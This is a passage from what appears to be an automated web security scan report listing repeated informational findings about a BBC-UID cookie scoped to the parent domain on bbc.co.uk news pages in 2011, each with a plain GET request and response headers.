Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.54. http://www.bbc.co.uk/news/science-environment-12424620

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=742
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.55. http://www.bbc.co.uk/news/technology-12419672

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/technology-12419672 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:52 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:52 GMT
Connection: close
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.56. http://www.bbc.co.uk/news/technology-12429808

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/technology-12429808 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.57. http://www.bbc.co.uk/news/uk-12427839

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-12427839 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.58. http://www.bbc.co.uk/news/uk-12435618

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12435618

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-12435618 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=762
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.59. http://www.bbc.co.uk/news/uk-12437244

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-12437244 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:55 GMT
Keep-Alive: timeout=10, max=768
Expires: Sat, 12 Feb 2011 02:02:55 GMT
Connection: close
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.60. http://www.bbc.co.uk/news/uk-england-london-12438040

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-england-london-12438040 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.61. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-northern-ireland-12427112 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.62. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-northern-ireland-12428837 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.63. http://www.bbc.co.uk/news/uk-politics-12428814

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-politics-12428814 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=679
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.64. http://www.bbc.co.uk/news/uk-scotland-12433015

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-scotland-12433015 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:59 GMT
Keep-Alive: timeout=10, max=758
Expires: Sat, 12 Feb 2011 02:02:59 GMT
Connection: close
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.65. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-scotland-tayside-central-12433192 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:00 GMT
Keep-Alive: timeout=10, max=723
Expires: Sat, 12 Feb 2011 02:03:00 GMT
Connection: close
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.66. http://www.bbc.co.uk/news/uk-wales-12427865

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-wales-12427865 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=731
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.67. http://www.bbc.co.uk/news/uk-wales-12433322

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-wales-12433322 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=660
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.68. http://www.bbc.co.uk/news/world-12428938

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-12428938 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:02 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:02 GMT
Connection: close
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.69. http://www.bbc.co.uk/news/world-12434787

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12434787

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-12434787 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.70. http://www.bbc.co.uk/news/world-africa-12427390

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12427390

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12427390 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:12 GMT
Keep-Alive: timeout=10, max=769
Expires: Sat, 12 Feb 2011 02:03:12 GMT
Connection: close
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.71. http://www.bbc.co.uk/news/world-africa-12430115

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12430115

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
